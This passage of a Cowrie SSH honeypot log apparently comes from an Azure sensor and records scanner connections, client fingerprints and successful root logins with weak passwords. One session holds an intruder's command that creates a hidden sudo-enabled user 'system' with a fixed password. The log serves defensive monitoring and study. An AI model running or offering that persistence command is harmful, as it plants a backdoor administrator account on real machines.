a-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""aes128-gcm@openssh.com"",""arcfour256"",""arcfour128"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""aes128-gcm
@openssh.com"",""arcfour256"",""arcfour128"",""aes128-cbc"",""3des-cbc"",""arcfour""],""macCS"":[""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 7216c7c473918b4f83d1139b3c70dbf9"",""sensor"":""server01"",""timestamp"":""2024-09-20T15:57:28.336915Z"",""src_ip"":""64.62.197.137"",""session"":""8816a9320164""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:57:32.259 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":3.9980390071868896,""message"":""Connection lost after 3 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T15:57:32.258948Z"",""src_ip"":""64.62.197.137"",""session"":""8816a9320164""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:41:18.363 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""147.185.132.24"",""src_port"":61974,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""f429a2a09e9a"",""protocol"":""ssh"",""message"":""New connection: 147.185.132.24:61974 (10.0.0.4:2222) [session: f429a2a09e9a]"",""sensor"":""server01"",""timestamp"":""2024-09-20T16:41:18.101383Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:41:19.191 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-ZGrab ZGrab SSH Survey"",""message"":""Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey"",""sensor"":""server01"",""timestamp"":""2024-09-20T16:41:19.190111Z"",""src_ip"":""147.185.132.24"",""session"":""f429a2a09e9a""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:41:19.885 PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""dd9bcf093c355da7000132131cb36fd0"",""hasshAlgorithms"":""diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib"",""kexAlgs"":[""diffie-hellman-group-exchange-sha256"",""diffie-hellman-group-exchange-sha1"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1""],""keyAlgs"":[""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-ed25519-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ssh-rsa-cert-v00@openssh.com"",""ssh-dss-cert-v00@openssh.com"",""ssh-ed25519"",""ssh-rsa"",""ssh-dss""],""encCS"":[""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""arcfour256"",""arcfour128"",""aes128-gcm@openssh.com"",""aes256-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-cbc"",""3des-cbc"",""blowfish-cbc"",""cast128-cbc"",""aes192-cbc"",""aes256-cbc"",""arcfour"",""rijndael-cbc@l
ysator.liu.se""],""macCS"":[""hmac-md5-etm@openssh.com"",""hmac-sha1-etm@openssh.com"",""umac-64-etm@openssh.com"",""umac-128-etm@openssh.com"",""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-512-etm@openssh.com"",""hmac-ripemd160-etm@openssh.com"",""hmac-sha1-96-etm@openssh.com"",""hmac-md5-96-etm@openssh.com"",""hmac-md5"",""hmac-sha1"",""umac-64@openssh.com"",""umac-128@openssh.com"",""hmac-sha2-256"",""hmac-sha2-512"",""hmac-ripemd160"",""hmac-ripemd160@openssh.com"",""hmac-sha1-96"",""hmac-md5-96""],""compCS"":[""none"",""zlib@openssh.com"",""zlib""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0"",""sensor"":""server01"",""timestamp"":""2024-09-20T16:41:19.883106Z"",""src_ip"":""147.185.132.24"",""session"":""f429a2a09e9a""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:41:22.050 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":3.946960926055908,""message"":""Connection lost after 3 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T16:41:22.049649Z"",""src_ip"":""147.185.132.24"",""session"":""f429a2a09e9a""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:57:42.753 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""183.81.169.238"",""src_port"":33148,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""6a5ffb57f5d1"",""protocol"":""ssh"",""message"":""New connection: 183.81.169.238:33148 (10.0.0.4:2222) [session: 6a5ffb57f5d1]"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:57:42.752535Z""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:57:43.061 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:57:43.060419Z"",""src_ip"":""183.81.169.238"",""session"":""6a5ffb57f5d1""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:57:43.065 PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""rsa-sha2-512-cert-v01@openssh.com"",""rsa-sha2-256-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",
""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:57:43.062170Z"",""src_ip"":""183.81.169.238"",""session"":""6a5ffb57f5d1""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:57:44.906 PM",,"{""eventid"":""cowrie.login.success"",""username"":""root"",""password"":""0"",""message"":""login attempt [root/0] succeeded"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:57:44.906087Z"",""src_ip"":""183.81.169.238"",""session"":""6a5ffb57f5d1""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:57:45.587 PM",,"{""eventid"":""cowrie.session.params"",""arch"":""linux-x64-lsb"",""message"":[],""sensor"":""server01"",""timestamp"":""2024-09-20T17:57:45.585066Z"",""src_ip"":""183.81.169.238"",""session"":""6a5ffb57f5d1""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:57:45.588 PM",,"{""eventid"":""cowrie.command.input"",""input"":""apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd -1 Kd6bHUYw) system && sudo usermod -aG sudo system"",""message"":""CMD: apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd -1 Kd6bHUYw) system && sudo usermod -aG sudo system"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:57:45.587543Z"",""src_ip"":""183.81.169.238"",""session"":""6a5ffb57f5d1""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:57:45.589 PM",,"{""eventid"":""cowrie.command.input"",""input"":""openssl passwd -1 Kd6bHUYw"",""message"":""CMD: openssl passwd -1 Kd6bHUYw"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:57:45.588671Z"",""src_ip"":""183.81.169.238"",""session"":""6a5ffb57f5d1""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:57:45.590 PM",,"{""eventid"":""cowrie.command.failed"",""input"":""openssl passwd -1 Kd6bHUYw"",""message"":""Command not found: openssl passwd -1 Kd6bHUYw"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:57:45.590097Z"",""src_ip"":""183.81.169.238"",""session"":""6a5ffb57f5d1""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:57:45.593 PM",,"{""eventid"":""cowrie.command.failed"",""input"":""apt update"",""message"":""Command not found: apt update"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:57:45.592261Z"",""src_ip"":""183.81.169.238"",""session"":""6a5ffb57f5d1""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:57:45.595 PM",,"{""eventid"":""cowrie.command.failed"",""input"":""apt install sudo curl -y"",""message"":""Command not found: apt install sudo curl -y"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:57:45.593972Z"",""src_ip"":""183.81.169.238"",""session"":""6a5ffb57f5d1""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:57:45.897 PM",,"{""eventid"":""cowrie.log.closed"",""ttylog"":""var/lib/cowrie/tty/fcbf76ccad3270aa8b28e173616cb5e41c85fd8194e050be0d54997bd8877d7e"",""size"":725,""shasum"":""fcbf76ccad3270aa8b28e173616cb5e41c85fd8194e050be0d54997bd8877d7e"",""duplicate"":false,""duration"":0.31137514114379883,""message"":""Closing TTY Log: var/lib/cowrie/tty/fcbf76ccad3270aa8b28e173616cb5e41c85fd8194e050be0d54997bd8877d7e after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:57:45.896042Z"",""src_ip"":""183.81.169.238"",""session"":""6a5ffb57f5d1""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:57:45.899 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":3.144550085067749,""message"":""Connection lost after 3 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:57:45.898667Z"",""src_ip"":""183.81.169.238"",""session"":""6a5ffb57f5d1""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:12:34.362 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""222.71.54.18"",""src_port"":2620,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""dcdf040c7fb2"",""protocol"":""ssh"",""message"":""New connection: 222.71.54.18:2620 (10.0.0.4:2222) [session: dcdf040c7fb2]"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:12:34.361296Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" 
+"9/20/2024, 7:12:35.488 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":1.12491774559021,""message"":""Connection lost after 1 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:12:35.487596Z"",""src_ip"":""222.71.54.18"",""session"":""dcdf040c7fb2""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:12:35.778 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""222.71.54.18"",""src_port"":24510,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""5777b601e7df"",""protocol"":""ssh"",""message"":""New connection: 222.71.54.18:24510 (10.0.0.4:2222) [session: 5777b601e7df]"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:12:35.777374Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:12:51.220 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:12:51.219392Z"",""src_ip"":""222.71.54.18"",""session"":""5777b601e7df""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:12:51.223 
PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""98f63c4d9c87edbd97ed4747fa031019"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""rsa-sha2-256-cert-v01@openssh.com"",""rsa-sha2-512-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""rsa-sha2-256"",""rsa-sha2-512"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-gcm@openssh.com"",""aes256-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-512-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha2-512"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:12:51.220931Z"",""src_ip"":""222.71.54.18"",""session"":""5777b601e7df""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:12:52.893 
PM",,"{""eventid"":""cowrie.login.success"",""username"":""root"",""password"":""---fuck_you----"",""message"":""login attempt [root/---fuck_you----] succeeded"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:12:52.892271Z"",""src_ip"":""222.71.54.18"",""session"":""5777b601e7df""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:12:53.419 PM",,"{""eventid"":""cowrie.session.params"",""arch"":""linux-x64-lsb"",""message"":[],""sensor"":""server01"",""timestamp"":""2024-09-20T19:12:53.418676Z"",""src_ip"":""222.71.54.18"",""session"":""5777b601e7df""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:12:53.421 PM",,"{""eventid"":""cowrie.command.input"",""input"":""uname -s -m"",""message"":""CMD: uname -s -m"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:12:53.420017Z"",""src_ip"":""222.71.54.18"",""session"":""5777b601e7df""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:12:53.687 PM",,"{""eventid"":""cowrie.log.closed"",""ttylog"":""var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906"",""size"":13,""shasum"":""6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906"",""duplicate"":true,""duration"":0.2677001953125,""message"":""Closing TTY Log: var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906 after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:12:53.686022Z"",""src_ip"":""222.71.54.18"",""session"":""5777b601e7df""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:12:53.689 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":17.909624814987183,""message"":""Connection lost after 17 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:12:53.688303Z"",""src_ip"":""222.71.54.18"",""session"":""5777b601e7df""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:18:28.257 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""45.79.181.104"",""src_port"":34888,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""06e637a0e45a"",""protocol"":""ssh"",""message"":""New connection: 45.79.181.104:34888 (10.0.0.4:2222) [session: 06e637a0e45a]"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:18:28.256185Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:18:28.258 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:18:28.257760Z"",""src_ip"":""45.79.181.104"",""session"":""06e637a0e45a""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:18:28.267 
PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""rsa-sha2-512-cert-v01@openssh.com"",""rsa-sha2-256-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:18:28.266037Z"",""src_ip"":""45.79.181.104"",""session"":""06e637a0e45a""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:18:28.279 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.020731210708618164,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:18:28.278342Z"",""src_ip"":""45.79.181.104"",""session"":""06e637a0e45a""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:18:28.288 
PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""45.79.181.104"",""src_port"":34890,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""36f4dcfabbcb"",""protocol"":""ssh"",""message"":""New connection: 45.79.181.104:34890 (10.0.0.4:2222) [session: 36f4dcfabbcb]"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:18:28.286948Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:18:28.289 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:18:28.288619Z"",""src_ip"":""45.79.181.104"",""session"":""36f4dcfabbcb""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:18:28.299 
PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521""],""encCS"":[""aes128-gcm@